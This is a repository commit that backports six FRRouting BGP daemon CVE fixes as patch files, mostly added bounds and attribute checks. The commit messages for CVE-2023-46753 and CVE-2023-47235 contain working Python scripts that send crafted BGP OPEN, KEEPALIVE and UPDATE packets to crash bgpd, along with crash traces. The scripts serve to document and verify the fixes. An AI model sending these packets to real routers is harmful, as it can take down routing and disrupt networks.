diff options
author | Narpat Mali <narpat.mali@windriver.com> | 2023-11-21 08:02:36 +0000 |
---|---|---|
committer | Armin Kuster <akuster808@gmail.com> | 2023-12-13 13:35:51 -0500 |
commit | cdab5037c9dea0eca042010d3b7af984edfc9f79 (patch) | |
tree | 7ec790dc11b4f2b66740a15424f714df46367e10 | |
parent | 8a75c61cce2aa1d6e5a3597ab8fc5a7e6aeae1e4 (diff) | |
download | meta-openembedded-cdab5037c9dea0eca042010d3b7af984edfc9f79.tar.gz |
frr: Fix for multiple CVE's
Backport the below CVE fixes.
CVE-2023-38406: https://security-tracker.debian.org/tracker/CVE-2023-38406
CVE-2023-38407: https://security-tracker.debian.org/tracker/CVE-2023-38407
CVE-2023-46752: https://security-tracker.debian.org/tracker/CVE-2023-46752
CVE-2023-46753: https://security-tracker.debian.org/tracker/CVE-2023-46753
CVE-2023-47234: https://security-tracker.debian.org/tracker/CVE-2023-47234
CVE-2023-47235: https://security-tracker.debian.org/tracker/CVE-2023-47235
Signed-off-by: Narpat Mali <narpat.mali@windriver.com>
Signed-off-by: Armin Kuster <akuster808@gmail.com>
7 files changed, 569 insertions, 0 deletions
diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-38406.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-38406.patch new file mode 100644 index 000000000..9d5f306fe --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-38406.patch | |||
@@ -0,0 +1,42 @@ | |||
1 | From f2a5c583fc8f7c515f3d6e6f929dcbcc61f7e4b7 Mon Sep 17 00:00:00 2001 | ||
2 | From: Donald Sharp <sharpd@nvidia.com> | ||
3 | Date: Mon, 20 Nov 2023 11:43:27 +0000 | ||
4 | Subject: [PATCH 1/6] bgpd: Flowspec overflow issue | ||
5 | |||
6 | According to the flowspec RFC 8955 a flowspec nlri is <length, <nlri data>> | ||
7 | Specifying 0 as a length makes BGP get all warm on the inside. Which | ||
8 | in this case is not a good thing at all. Prevent warmth, stay cold | ||
9 | on the inside. | ||
10 | |||
11 | Reported-by: Iggy Frankovic <iggyfran@amazon.com> | ||
12 | Signed-off-by: Donald Sharp <sharpd@nvidia.com> | ||
13 | |||
14 | CVE: CVE-2023-38406 | ||
15 | |||
16 | Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/0b999c886e241c52bd1f7ef0066700e4b618ebb3] | ||
17 | |||
18 | Signed-off-by: Narpat Mali <narpat.mali@windriver.com> | ||
19 | --- | ||
20 | bgpd/bgp_flowspec.c | 7 +++++++ | ||
21 | 1 file changed, 7 insertions(+) | ||
22 | |||
23 | diff --git a/bgpd/bgp_flowspec.c b/bgpd/bgp_flowspec.c | ||
24 | index 3e2b1ac49..95fbd340a 100644 | ||
25 | --- a/bgpd/bgp_flowspec.c | ||
26 | +++ b/bgpd/bgp_flowspec.c | ||
27 | @@ -148,6 +148,13 @@ int bgp_nlri_parse_flowspec(struct peer *peer, struct attr *attr, | ||
28 | psize); | ||
29 | return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW; | ||
30 | } | ||
31 | + | ||
32 | + if (psize == 0) { | ||
33 | + flog_err(EC_BGP_FLOWSPEC_PACKET, | ||
34 | + "Flowspec NLRI length 0 which makes no sense"); | ||
35 | + return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW; | ||
36 | + } | ||
37 | + | ||
38 | if (bgp_fs_nlri_validate(pnt, psize, afi) < 0) { | ||
39 | flog_err( | ||
40 | EC_BGP_FLOWSPEC_PACKET, | ||
41 | -- | ||
42 | 2.40.0 | ||
diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-38407.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-38407.patch new file mode 100644 index 000000000..782b44615 --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-38407.patch | |||
@@ -0,0 +1,63 @@ | |||
1 | From 3880f66bd053d1f56af74852ca57ba166d880920 Mon Sep 17 00:00:00 2001 | ||
2 | From: Donald Sharp <sharpd@nvidia.com> | ||
3 | Date: Mon, 20 Nov 2023 12:03:29 +0000 | ||
4 | Subject: [PATCH 2/6] bgpd: Fix use beyond end of stream of labeled unicast | ||
5 | parsing | ||
6 | |||
7 | Fixes a couple crashes associated with attempting to read | ||
8 | beyond the end of the stream. | ||
9 | |||
10 | Reported-by: Iggy Frankovic <iggyfran@amazon.com> | ||
11 | Signed-off-by: Donald Sharp <sharpd@nvidia.com> | ||
12 | |||
13 | CVE: CVE-2023-38407 | ||
14 | |||
15 | Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/7404a914b0cafe046703c8381903a80d3def8f8b] | ||
16 | |||
17 | Signed-off-by: Narpat Mali <narpat.mali@windriver.com> | ||
18 | --- | ||
19 | bgpd/bgp_label.c | 15 +++++++++++++++ | ||
20 | 1 file changed, 15 insertions(+) | ||
21 | |||
22 | diff --git a/bgpd/bgp_label.c b/bgpd/bgp_label.c | ||
23 | index 4a20f2c09..b65c98e86 100644 | ||
24 | --- a/bgpd/bgp_label.c | ||
25 | +++ b/bgpd/bgp_label.c | ||
26 | @@ -299,6 +299,9 @@ static int bgp_nlri_get_labels(struct peer *peer, uint8_t *pnt, uint8_t plen, | ||
27 | uint8_t llen = 0; | ||
28 | uint8_t label_depth = 0; | ||
29 | |||
30 | + if (plen < BGP_LABEL_BYTES) | ||
31 | + return 0; | ||
32 | + | ||
33 | for (; data < lim; data += BGP_LABEL_BYTES) { | ||
34 | memcpy(label, data, BGP_LABEL_BYTES); | ||
35 | llen += BGP_LABEL_BYTES; | ||
36 | @@ -361,6 +364,9 @@ int bgp_nlri_parse_label(struct peer *peer, struct attr *attr, | ||
37 | memcpy(&addpath_id, pnt, BGP_ADDPATH_ID_LEN); | ||
38 | addpath_id = ntohl(addpath_id); | ||
39 | pnt += BGP_ADDPATH_ID_LEN; | ||
40 | + | ||
41 | + if (pnt >= lim) | ||
42 | + return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW; | ||
43 | } | ||
44 | |||
45 | /* Fetch prefix length. */ | ||
46 | @@ -379,6 +385,15 @@ int bgp_nlri_parse_label(struct peer *peer, struct attr *attr, | ||
47 | |||
48 | /* Fill in the labels */ | ||
49 | llen = bgp_nlri_get_labels(peer, pnt, psize, &label); | ||
50 | + if (llen == 0) { | ||
51 | + flog_err( | ||
52 | + EC_BGP_UPDATE_RCV, | ||
53 | + "%s [Error] Update packet error (wrong label length 0)", | ||
54 | + peer->host); | ||
55 | + bgp_notify_send(peer, BGP_NOTIFY_UPDATE_ERR, | ||
56 | + BGP_NOTIFY_UPDATE_INVAL_NETWORK); | ||
57 | + return BGP_NLRI_PARSE_ERROR_LABEL_LENGTH; | ||
58 | + } | ||
59 | p.prefixlen = prefixlen - BSIZE(llen); | ||
60 | |||
61 | /* There needs to be at least one label */ | ||
62 | -- | ||
63 | 2.40.0 | ||
diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-46752.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-46752.patch new file mode 100644 index 000000000..17ba41037 --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-46752.patch | |||
@@ -0,0 +1,127 @@ | |||
1 | From 1c4882b83a1db705abd5d384dd0b7ef4c0e3b4ee Mon Sep 17 00:00:00 2001 | ||
2 | From: Donatas Abraitis <donatas@opensourcerouting.org> | ||
3 | Date: Mon, 20 Nov 2023 14:11:13 +0000 | ||
4 | Subject: [PATCH 3/6] bgpd: Handle MP_REACH_NLRI malformed packets with session | ||
5 | reset | ||
6 | |||
7 | Avoid crashing bgpd. | ||
8 | |||
9 | ``` | ||
10 | (gdb) | ||
11 | bgp_mp_reach_parse (args=<optimized out>, mp_update=0x7fffffffe140) at bgpd/bgp_attr.c:2341 | ||
12 | 2341 stream_get(&attr->mp_nexthop_global, s, IPV6_MAX_BYTELEN); | ||
13 | (gdb) | ||
14 | stream_get (dst=0x7fffffffe1ac, s=0x7ffff0006e80, size=16) at lib/stream.c:320 | ||
15 | 320 { | ||
16 | (gdb) | ||
17 | 321 STREAM_VERIFY_SANE(s); | ||
18 | (gdb) | ||
19 | 323 if (STREAM_READABLE(s) < size) { | ||
20 | (gdb) | ||
21 | 34 return __builtin___memcpy_chk (__dest, __src, __len, __bos0 (__dest)); | ||
22 | (gdb) | ||
23 | |||
24 | Thread 1 "bgpd" received signal SIGSEGV, Segmentation fault. | ||
25 | 0x00005555556e37be in route_set_aspath_prepend (rule=0x555555aac0d0, prefix=0x7fffffffe050, | ||
26 | object=0x7fffffffdb00) at bgpd/bgp_routemap.c:2282 | ||
27 | 2282 if (path->attr->aspath->refcnt) | ||
28 | (gdb) | ||
29 | ``` | ||
30 | |||
31 | With the configuration: | ||
32 | |||
33 | ``` | ||
34 | neighbor 127.0.0.1 remote-as external | ||
35 | neighbor 127.0.0.1 passive | ||
36 | neighbor 127.0.0.1 ebgp-multihop | ||
37 | neighbor 127.0.0.1 disable-connected-check | ||
38 | neighbor 127.0.0.1 update-source 127.0.0.2 | ||
39 | neighbor 127.0.0.1 timers 3 90 | ||
40 | neighbor 127.0.0.1 timers connect 1 | ||
41 | address-family ipv4 unicast | ||
42 | redistribute connected | ||
43 | neighbor 127.0.0.1 default-originate | ||
44 | neighbor 127.0.0.1 route-map RM_IN in | ||
45 | exit-address-family | ||
46 | ! | ||
47 | route-map RM_IN permit 10 | ||
48 | set as-path prepend 200 | ||
49 | exit | ||
50 | ``` | ||
51 | |||
52 | Reported-by: Iggy Frankovic <iggyfran@amazon.com> | ||
53 | Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org> | ||
54 | |||
55 | CVE: CVE-2023-46752 | ||
56 | |||
57 | Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/b08afc81c60607a4f736f418f2e3eb06087f1a35] | ||
58 | |||
59 | Signed-off-by: Narpat Mali <narpat.mali@windriver.com> | ||
60 | --- | ||
61 | bgpd/bgp_attr.c | 6 +----- | ||
62 | bgpd/bgp_attr.h | 1 - | ||
63 | bgpd/bgp_packet.c | 6 +----- | ||
64 | 3 files changed, 2 insertions(+), 11 deletions(-) | ||
65 | |||
66 | diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c | ||
67 | index b10a60351..e0542356c 100644 | ||
68 | --- a/bgpd/bgp_attr.c | ||
69 | +++ b/bgpd/bgp_attr.c | ||
70 | @@ -2207,7 +2207,7 @@ int bgp_mp_reach_parse(struct bgp_attr_parser_args *args, | ||
71 | |||
72 | mp_update->afi = afi; | ||
73 | mp_update->safi = safi; | ||
74 | - return BGP_ATTR_PARSE_EOR; | ||
75 | + return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_MAL_ATTR, 0); | ||
76 | } | ||
77 | |||
78 | mp_update->afi = afi; | ||
79 | @@ -3345,10 +3345,6 @@ bgp_attr_parse_ret_t bgp_attr_parse(struct peer *peer, struct attr *attr, | ||
80 | goto done; | ||
81 | } | ||
82 | |||
83 | - if (ret == BGP_ATTR_PARSE_EOR) { | ||
84 | - goto done; | ||
85 | - } | ||
86 | - | ||
87 | if (ret == BGP_ATTR_PARSE_ERROR) { | ||
88 | flog_warn(EC_BGP_ATTRIBUTE_PARSE_ERROR, | ||
89 | "%s: Attribute %s, parse error", peer->host, | ||
90 | diff --git a/bgpd/bgp_attr.h b/bgpd/bgp_attr.h | ||
91 | index 781bfdec3..69f962134 100644 | ||
92 | --- a/bgpd/bgp_attr.h | ||
93 | +++ b/bgpd/bgp_attr.h | ||
94 | @@ -378,7 +378,6 @@ typedef enum { | ||
95 | /* only used internally, send notify + convert to BGP_ATTR_PARSE_ERROR | ||
96 | */ | ||
97 | BGP_ATTR_PARSE_ERROR_NOTIFYPLS = -3, | ||
98 | - BGP_ATTR_PARSE_EOR = -4, | ||
99 | } bgp_attr_parse_ret_t; | ||
100 | |||
101 | struct bpacket_attr_vec_arr; | ||
102 | diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c | ||
103 | index 2fd28aae3..261695198 100644 | ||
104 | --- a/bgpd/bgp_packet.c | ||
105 | +++ b/bgpd/bgp_packet.c | ||
106 | @@ -1843,8 +1843,7 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size) | ||
107 | * Non-MP IPv4/Unicast EoR is a completely empty UPDATE | ||
108 | * and MP EoR should have only an empty MP_UNREACH | ||
109 | */ | ||
110 | - if ((!update_len && !withdraw_len && nlris[NLRI_MP_UPDATE].length == 0) | ||
111 | - || (attr_parse_ret == BGP_ATTR_PARSE_EOR)) { | ||
112 | + if (!update_len && !withdraw_len && nlris[NLRI_MP_UPDATE].length == 0) { | ||
113 | afi_t afi = 0; | ||
114 | safi_t safi; | ||
115 | struct graceful_restart_info *gr_info; | ||
116 | @@ -1865,9 +1864,6 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size) | ||
117 | && nlris[NLRI_MP_WITHDRAW].length == 0) { | ||
118 | afi = nlris[NLRI_MP_WITHDRAW].afi; | ||
119 | safi = nlris[NLRI_MP_WITHDRAW].safi; | ||
120 | - } else if (attr_parse_ret == BGP_ATTR_PARSE_EOR) { | ||
121 | - afi = nlris[NLRI_MP_UPDATE].afi; | ||
122 | - safi = nlris[NLRI_MP_UPDATE].safi; | ||
123 | } | ||
124 | |||
125 | if (afi && peer->afc[afi][safi]) { | ||
126 | -- | ||
127 | 2.40.0 | ||
diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-46753.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-46753.patch new file mode 100644 index 000000000..855eb190d --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-46753.patch | |||
@@ -0,0 +1,119 @@ | |||
1 | From 60bd794a9cf6df05503a062e113161dcbdbfac9d Mon Sep 17 00:00:00 2001 | ||
2 | From: Donatas Abraitis <donatas@opensourcerouting.org> | ||
3 | Date: Mon, 20 Nov 2023 14:22:22 +0000 | ||
4 | Subject: [PATCH 4/6] bgpd: Check mandatory attributes more carefully for | ||
5 | UPDATE message | ||
6 | |||
7 | If we send a crafted BGP UPDATE message without mandatory attributes, we do | ||
8 | not check if the length of the path attributes is zero or not. We only check | ||
9 | if attr->flag is at least set or not. Imagine we send only unknown transit | ||
10 | attribute, then attr->flag is always 0. Also, this is true only if graceful-restart | ||
11 | capability is received. | ||
12 | |||
13 | A crash: | ||
14 | |||
15 | ``` | ||
16 | bgpd[7834]: [TJ23Y-GY0RH] 127.0.0.1 Unknown attribute is received (type 31, length 16) | ||
17 | bgpd[7834]: [PCFFM-WMARW] 127.0.0.1(donatas-pc) rcvd UPDATE wlen 0 attrlen 20 alen 17 | ||
18 | BGP[7834]: Received signal 11 at 1698089639 (si_addr 0x0, PC 0x55eefd375b4a); aborting... | ||
19 | BGP[7834]: /usr/local/lib/libfrr.so.0(zlog_backtrace_sigsafe+0x6d) [0x7f3205ca939d] | ||
20 | BGP[7834]: /usr/local/lib/libfrr.so.0(zlog_signal+0xf3) [0x7f3205ca9593] | ||
21 | BGP[7834]: /usr/local/lib/libfrr.so.0(+0xf5181) [0x7f3205cdd181] | ||
22 | BGP[7834]: /lib/x86_64-linux-gnu/libpthread.so.0(+0x12980) [0x7f3204ff3980] | ||
23 | BGP[7834]: /usr/lib/frr/bgpd(+0x18ab4a) [0x55eefd375b4a] | ||
24 | BGP[7834]: /usr/local/lib/libfrr.so.0(route_map_apply_ext+0x310) [0x7f3205cd1290] | ||
25 | BGP[7834]: /usr/lib/frr/bgpd(+0x163610) [0x55eefd34e610] | ||
26 | BGP[7834]: /usr/lib/frr/bgpd(bgp_update+0x9a5) [0x55eefd35c1d5] | ||
27 | BGP[7834]: /usr/lib/frr/bgpd(bgp_nlri_parse_ip+0xb7) [0x55eefd35e867] | ||
28 | BGP[7834]: /usr/lib/frr/bgpd(+0x1555e6) [0x55eefd3405e6] | ||
29 | BGP[7834]: /usr/lib/frr/bgpd(bgp_process_packet+0x747) [0x55eefd345597] | ||
30 | BGP[7834]: /usr/local/lib/libfrr.so.0(event_call+0x83) [0x7f3205cef4a3] | ||
31 | BGP[7834]: /usr/local/lib/libfrr.so.0(frr_run+0xc0) [0x7f3205ca10a0] | ||
32 | BGP[7834]: /usr/lib/frr/bgpd(main+0x409) [0x55eefd2dc979] | ||
33 | ``` | ||
34 | |||
35 | Sending: | ||
36 | |||
37 | ``` | ||
38 | import socket | ||
39 | import time | ||
40 | |||
41 | OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" | ||
42 | b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02" | ||
43 | b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02" | ||
44 | b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00" | ||
45 | b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d" | ||
46 | b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01" | ||
47 | b"\x80\x00\x00\x00") | ||
48 | |||
49 | KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" | ||
50 | b"\xff\xff\xff\xff\xff\xff\x00\x13\x04") | ||
51 | |||
52 | UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff003c0200000014ff1f001000040146464646460004464646464646664646f50d05800100010200ffff000000") | ||
53 | |||
54 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | ||
55 | s.connect(('127.0.0.2', 179)) | ||
56 | s.send(OPEN) | ||
57 | data = s.recv(1024) | ||
58 | s.send(KEEPALIVE) | ||
59 | data = s.recv(1024) | ||
60 | s.send(UPDATE) | ||
61 | data = s.recv(1024) | ||
62 | time.sleep(1000) | ||
63 | s.close() | ||
64 | ``` | ||
65 | |||
66 | Reported-by: Iggy Frankovic <iggyfran@amazon.com> | ||
67 | Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org> | ||
68 | |||
69 | CVE: CVE-2023-46753 | ||
70 | |||
71 | Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/d8482bf011cb2b173e85b65b4bf3d5061250cdb9] | ||
72 | |||
73 | Signed-off-by: Narpat Mali <narpat.mali@windriver.com> | ||
74 | --- | ||
75 | bgpd/bgp_attr.c | 10 ++++++---- | ||
76 | 1 file changed, 6 insertions(+), 4 deletions(-) | ||
77 | |||
78 | diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c | ||
79 | index e0542356c..35122943e 100644 | ||
80 | --- a/bgpd/bgp_attr.c | ||
81 | +++ b/bgpd/bgp_attr.c | ||
82 | @@ -3044,13 +3044,15 @@ static bgp_attr_parse_ret_t bgp_attr_unknown(struct bgp_attr_parser_args *args) | ||
83 | } | ||
84 | |||
85 | /* Well-known attribute check. */ | ||
86 | -static int bgp_attr_check(struct peer *peer, struct attr *attr) | ||
87 | +static int bgp_attr_check(struct peer *peer, struct attr *attr, | ||
88 | + bgp_size_t length) | ||
89 | { | ||
90 | uint8_t type = 0; | ||
91 | |||
92 | /* BGP Graceful-Restart End-of-RIB for IPv4 unicast is signaled as an | ||
93 | * empty UPDATE. */ | ||
94 | - if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag) | ||
95 | + if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag && | ||
96 | + !length) | ||
97 | return BGP_ATTR_PARSE_PROCEED; | ||
98 | |||
99 | /* "An UPDATE message that contains the MP_UNREACH_NLRI is not required | ||
100 | @@ -3101,7 +3103,7 @@ bgp_attr_parse_ret_t bgp_attr_parse(struct peer *peer, struct attr *attr, | ||
101 | bgp_attr_parse_ret_t ret; | ||
102 | uint8_t flag = 0; | ||
103 | uint8_t type = 0; | ||
104 | - bgp_size_t length; | ||
105 | + bgp_size_t length = 0; | ||
106 | uint8_t *startp, *endp; | ||
107 | uint8_t *attr_endp; | ||
108 | uint8_t seen[BGP_ATTR_BITMAP_SIZE]; | ||
109 | @@ -3416,7 +3418,7 @@ bgp_attr_parse_ret_t bgp_attr_parse(struct peer *peer, struct attr *attr, | ||
110 | } | ||
111 | |||
112 | /* Check all mandatory well-known attributes are present */ | ||
113 | - ret = bgp_attr_check(peer, attr); | ||
114 | + ret = bgp_attr_check(peer, attr, length); | ||
115 | if (ret < 0) | ||
116 | goto done; | ||
117 | |||
118 | -- | ||
119 | 2.40.0 | ||
diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-47234.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-47234.patch new file mode 100644 index 000000000..9bf63372a --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-47234.patch | |||
@@ -0,0 +1,98 @@ | |||
1 | From 682f100cd8d1bf7510939faa033f69ce64f965e9 Mon Sep 17 00:00:00 2001 | ||
2 | From: Donatas Abraitis <donatas@opensourcerouting.org> | ||
3 | Date: Mon, 20 Nov 2023 14:32:38 +0000 | ||
4 | Subject: [PATCH 5/6] bgpd: Ignore handling NLRIs if we received | ||
5 | MP_UNREACH_NLRI | ||
6 | |||
7 | If we receive MP_UNREACH_NLRI, we should stop handling remaining NLRIs if | ||
8 | no mandatory path attributes received. | ||
9 | |||
10 | In other words, if MP_UNREACH_NLRI received, the remaining NLRIs should be handled | ||
11 | as a new data, but without mandatory attributes, it's a malformed packet. | ||
12 | |||
13 | In normal case, this MUST not happen at all, but to avoid crashing bgpd, we MUST | ||
14 | handle that. | ||
15 | |||
16 | Reported-by: Iggy Frankovic <iggyfran@amazon.com> | ||
17 | Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org> | ||
18 | |||
19 | CVE: CVE-2023-47234 | ||
20 | |||
21 | Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/c37119df45bbf4ef713bc10475af2ee06e12f3bf] | ||
22 | |||
23 | Signed-off-by: Narpat Mali <narpat.mali@windriver.com> | ||
24 | --- | ||
25 | bgpd/bgp_attr.c | 19 ++++++++++--------- | ||
26 | bgpd/bgp_attr.h | 1 + | ||
27 | bgpd/bgp_packet.c | 7 ++++++- | ||
28 | 3 files changed, 17 insertions(+), 10 deletions(-) | ||
29 | |||
30 | diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c | ||
31 | index 35122943e..13da27e99 100644 | ||
32 | --- a/bgpd/bgp_attr.c | ||
33 | +++ b/bgpd/bgp_attr.c | ||
34 | @@ -3055,15 +3055,6 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr, | ||
35 | !length) | ||
36 | return BGP_ATTR_PARSE_PROCEED; | ||
37 | |||
38 | - /* "An UPDATE message that contains the MP_UNREACH_NLRI is not required | ||
39 | - to carry any other path attributes.", though if MP_REACH_NLRI or NLRI | ||
40 | - are present, it should. Check for any other attribute being present | ||
41 | - instead. | ||
42 | - */ | ||
43 | - if ((!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) && | ||
44 | - CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI)))) | ||
45 | - return BGP_ATTR_PARSE_PROCEED; | ||
46 | - | ||
47 | if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_ORIGIN))) | ||
48 | type = BGP_ATTR_ORIGIN; | ||
49 | |||
50 | @@ -3082,6 +3073,16 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr, | ||
51 | && !CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_LOCAL_PREF))) | ||
52 | type = BGP_ATTR_LOCAL_PREF; | ||
53 | |||
54 | + /* An UPDATE message that contains the MP_UNREACH_NLRI is not required | ||
55 | + * to carry any other path attributes. Though if MP_REACH_NLRI or NLRI | ||
56 | + * are present, it should. Check for any other attribute being present | ||
57 | + * instead. | ||
58 | + */ | ||
59 | + if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) && | ||
60 | + CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI))) | ||
61 | + return type ? BGP_ATTR_PARSE_MISSING_MANDATORY | ||
62 | + : BGP_ATTR_PARSE_PROCEED; | ||
63 | + | ||
64 | /* If any of the well-known mandatory attributes are not present | ||
65 | * in an UPDATE message, then "treat-as-withdraw" MUST be used. | ||
66 | */ | ||
67 | diff --git a/bgpd/bgp_attr.h b/bgpd/bgp_attr.h | ||
68 | index 69f962134..77640dd5b 100644 | ||
69 | --- a/bgpd/bgp_attr.h | ||
70 | +++ b/bgpd/bgp_attr.h | ||
71 | @@ -378,6 +378,7 @@ typedef enum { | ||
72 | /* only used internally, send notify + convert to BGP_ATTR_PARSE_ERROR | ||
73 | */ | ||
74 | BGP_ATTR_PARSE_ERROR_NOTIFYPLS = -3, | ||
75 | + BGP_ATTR_PARSE_MISSING_MANDATORY = -4, | ||
76 | } bgp_attr_parse_ret_t; | ||
77 | |||
78 | struct bpacket_attr_vec_arr; | ||
79 | diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c | ||
80 | index 261695198..c1c28f344 100644 | ||
81 | --- a/bgpd/bgp_packet.c | ||
82 | +++ b/bgpd/bgp_packet.c | ||
83 | @@ -1767,7 +1767,12 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size) | ||
84 | /* Network Layer Reachability Information. */ | ||
85 | update_len = end - stream_pnt(s); | ||
86 | |||
87 | - if (update_len && attribute_len) { | ||
88 | + /* If we received MP_UNREACH_NLRI attribute, but also NLRIs, then | ||
89 | + * NLRIs should be handled as a new data. Though, if we received | ||
90 | + * NLRIs without mandatory attributes, they should be ignored. | ||
91 | + */ | ||
92 | + if (update_len && attribute_len && | ||
93 | + attr_parse_ret != BGP_ATTR_PARSE_MISSING_MANDATORY) { | ||
94 | /* Set NLRI portion to structure. */ | ||
95 | nlris[NLRI_UPDATE].afi = AFI_IP; | ||
96 | nlris[NLRI_UPDATE].safi = SAFI_UNICAST; | ||
97 | -- | ||
98 | 2.40.0 | ||
diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-47235.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-47235.patch new file mode 100644 index 000000000..218dcba51 --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-47235.patch | |||
@@ -0,0 +1,114 @@ | |||
1 | From 024bdfcdf1d52db3a74f00a3370c3834a4bb78d0 Mon Sep 17 00:00:00 2001 | ||
2 | From: Donatas Abraitis <donatas@opensourcerouting.org> | ||
3 | Date: Mon, 20 Nov 2023 14:39:33 +0000 | ||
4 | Subject: [PATCH 6/6] bgpd: Treat EOR as withdrawn to avoid unwanted handling | ||
5 | of malformed attrs | ||
6 | |||
7 | Treat-as-withdraw, otherwise if we just ignore it, we will pass it to be | ||
8 | processed as a normal UPDATE without mandatory attributes, that could lead | ||
9 | to harmful behavior. In this case, a crash for route-maps with the configuration | ||
10 | such as: | ||
11 | |||
12 | ``` | ||
13 | router bgp 65001 | ||
14 | no bgp ebgp-requires-policy | ||
15 | neighbor 127.0.0.1 remote-as external | ||
16 | neighbor 127.0.0.1 passive | ||
17 | neighbor 127.0.0.1 ebgp-multihop | ||
18 | neighbor 127.0.0.1 disable-connected-check | ||
19 | neighbor 127.0.0.1 update-source 127.0.0.2 | ||
20 | neighbor 127.0.0.1 timers 3 90 | ||
21 | neighbor 127.0.0.1 timers connect 1 | ||
22 | ! | ||
23 | address-family ipv4 unicast | ||
24 | neighbor 127.0.0.1 addpath-tx-all-paths | ||
25 | neighbor 127.0.0.1 default-originate | ||
26 | neighbor 127.0.0.1 route-map RM_IN in | ||
27 | exit-address-family | ||
28 | exit | ||
29 | ! | ||
30 | route-map RM_IN permit 10 | ||
31 | set as-path prepend 200 | ||
32 | exit | ||
33 | ``` | ||
34 | |||
35 | Send a malformed optional transitive attribute: | ||
36 | |||
37 | ``` | ||
38 | import socket | ||
39 | import time | ||
40 | |||
41 | OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" | ||
42 | b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02" | ||
43 | b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02" | ||
44 | b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00" | ||
45 | b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d" | ||
46 | b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01" | ||
47 | b"\x80\x00\x00\x00") | ||
48 | |||
49 | KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" | ||
50 | b"\xff\xff\xff\xff\xff\xff\x00\x13\x04") | ||
51 | |||
52 | UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff002b0200000003c0ff00010100eb00ac100b0b001ad908ac100b0b") | ||
53 | |||
54 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | ||
55 | s.connect(('127.0.0.2', 179)) | ||
56 | s.send(OPEN) | ||
57 | data = s.recv(1024) | ||
58 | s.send(KEEPALIVE) | ||
59 | data = s.recv(1024) | ||
60 | s.send(UPDATE) | ||
61 | data = s.recv(1024) | ||
62 | time.sleep(100) | ||
63 | s.close() | ||
64 | ``` | ||
65 | |||
66 | Reported-by: Iggy Frankovic <iggyfran@amazon.com> | ||
